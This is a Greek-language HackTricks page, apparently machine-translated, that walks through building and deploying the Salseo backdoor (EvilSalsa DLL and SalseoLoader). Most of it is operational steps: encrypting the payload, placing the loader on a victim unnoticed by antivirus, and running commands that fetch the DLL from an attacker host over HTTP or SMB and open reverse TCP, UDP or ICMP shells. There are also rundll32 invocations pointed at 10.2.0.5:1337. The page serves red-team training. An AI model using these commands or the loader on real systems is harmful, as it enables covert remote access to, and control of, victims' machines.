11 KiB
Salseo
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:Εκπαίδευση HackTricks AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: Εκπαίδευση HackTricks GCP Red Team Expert (GRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε 💬 στην ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα χάκερ υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια στο github.
Συντάσσοντας τα δυαδικά αρχεία
Κατεβάστε τον πηγαίο κώδικα από το github και συντάξτε τα EvilSalsa και SalseoLoader. Θα χρειαστείτε το Visual Studio εγκατεστημένο για να συντάξετε τον κώδικα.
Συντάξτε αυτά τα έργα για την αρχιτεκτονική του παραθύρου όπου θα τα χρησιμοποιήσετε (Αν τα Windows υποστηρίζουν x64, συντάξτε τα για αυτές τις αρχιτεκτονικές).
Μπορείτε να επιλέξετε την αρχιτεκτονική μέσα στο Visual Studio στην αριστερή καρτέλα "Build" στο "Platform Target".
(**Αν δεν μπορείτε να βρείτε αυτές τις επιλογές, πατήστε στην καρτέλα Project και μετά στις "Ιδιότητες <Όνομα Έργου>")
Στη συνέχεια, συντάξτε και τα δύο έργα (Build -> Build Solution) (Μέσα στα logs θα εμφανιστεί η διαδρομή του εκτελέσιμου αρχείου):
Προετοιμασία της πίσω πόρτας
Καταρχάς, θα χρειαστείτε να κωδικοποιήσετε το EvilSalsa.dll. Για να το κάνετε αυτό, μπορείτε να χρησιμοποιήσετε το σενάριο python encrypterassembly.py ή μπορείτε να συντάξετε το έργο EncrypterAssembly:
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Τώρα έχεις ό,τι χρειάζεσαι για να εκτελέσεις όλο το πράγμα Salseo: το κωδικοποιημένο EvilDalsa.dll και το δυαδικό του SalseoLoader.
Μετέφερε το δυαδικό SalseoLoader.exe στη μηχανή. Δεν πρέπει να ανιχνευθεί από κανένα AV...
Εκτέλεση της πίσω πόρτας
Λήψη αντίστροφου κέλυφους TCP (λήψη κωδικοποιημένου dll μέσω HTTP)
Θυμηθείτε να ξεκινήσετε ένα nc ως ακροατή αντίστροφου κελύφους και ένα διακομιστή HTTP για να εξυπηρετήσει το κωδικοποιημένο evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Λήψη ενός αντίστροφου κέλυφους UDP (λήψη κωδικοποιημένου dll μέσω SMB)
Να θυμάστε να ξεκινήσετε ένα nc ως ακροατής αντίστροφου κελύφους και ένα διακομιστή SMB για να εξυπηρετήσει το κωδικοποιημένο evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Λήψη ενός αντίστροφου κελύφους ICMP (κωδικοποιημένο dll ήδη μέσα στο θύμα)
Αυτή τη φορά χρειάζεστε ένα ειδικό εργαλείο στον πελάτη για να λάβετε το αντίστροφο κελύφους. Λήψη: https://github.com/inquisb/icmpsh
Απενεργοποίηση απαντήσεων ICMP:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Εκτέλεση του πελάτη:
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
Μέσα στο θύμα, ας εκτελέσουμε το πράγμα salseo:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Συναρμολόγηση του SalseoLoader ως DLL εξαγωγής κύριας συνάρτησης
Ανοίξτε το έργο SalseoLoader χρησιμοποιώντας το Visual Studio.
Προσθέστε πριν από την κύρια συνάρτηση: [DllExport]
Εγκατάσταση του DllExport για αυτό το έργο
Εργαλεία --> Διαχειριστής πακέτων NuGet --> Διαχείριση πακέτων NuGet για τη λύση...
Αναζήτηση του πακέτου DllExport (χρησιμοποιώντας την καρτέλα Περιήγηση) και πατήστε Εγκατάσταση (και αποδεχτείτε το αναδυόμενο παράθυρο)
Στο φάκελο του έργου σας εμφανίζονται τα αρχεία: DllExport.bat και DllExport_Configure.bat
Απεγκατάσταση του DllExport
Πατήστε Απεγκατάσταση (ναι, είναι περίεργο αλλά εμπιστευτείτε με, είναι απαραίτητο)
Έξοδος από το Visual Studio και εκτέλεση του DllExport_configure
Απλά βγείτε από το Visual Studio
Στη συνέχεια, πηγαίνετε στον φάκελο του SalseoLoader και εκτελέστε το DllExport_Configure.bat
Επιλέξτε x64 (αν πρόκειται να το χρησιμοποιήσετε μέσα σε ένα x64 box, όπως ήταν το δικό μου), επιλέξτε System.Runtime.InteropServices (μέσα στο Χώρο ονομάτων για το DllExport) και πατήστε Εφαρμογή
Ανοίξτε ξανά το έργο με το Visual Studio
Το [DllExport] δε θα πρέπει πλέον να είναι σημειωμένο ως σφάλμα
Κατασκευή της λύσης
Επιλέξτε Τύπος Εξόδου = Βιβλιοθήκη κλάσεων (Έργο --> Ιδιότητες SalseoLoader --> Εφαρμογή --> Τύπος εξόδου = Βιβλιοθήκη κλάσεων)
Επιλέξτε πλατφόρμα x64 (Έργο --> Ιδιότητες SalseoLoader --> Κατασκευή --> Στόχος πλατφόρμας = x64)
Για να κατασκευάσετε τη λύση: Κατασκευή --> Κατασκευή Λύσης (Μέσα στην κονσόλα εξόδου θα εμφανιστεί η διαδρομή του νέου DLL)
Δοκιμάστε το δημιουργημένο Dll
Αντιγράψτε και επικολλήστε το Dll όπου θέλετε να το δοκιμάσετε.
Εκτελέστε:
rundll32.exe SalseoLoader.dll,main
Αν δεν εμφανίζεται κάποιο σφάλμα, πιθανόν να έχετε ένα λειτουργικό DLL!!
Λήψη κέλυφους χρησιμοποιώντας το DLL
Μην ξεχάσετε να χρησιμοποιήσετε ένα HTTP server και να ορίσετε έναν nc listener
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
Εντολή
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:Εκπαίδευση HackTricks AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: Εκπαίδευση HackTricks GCP Red Team Expert (GRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα χάκερ υποβάλλοντας PRs στα αποθετήρια HackTricks και HackTricks Cloud.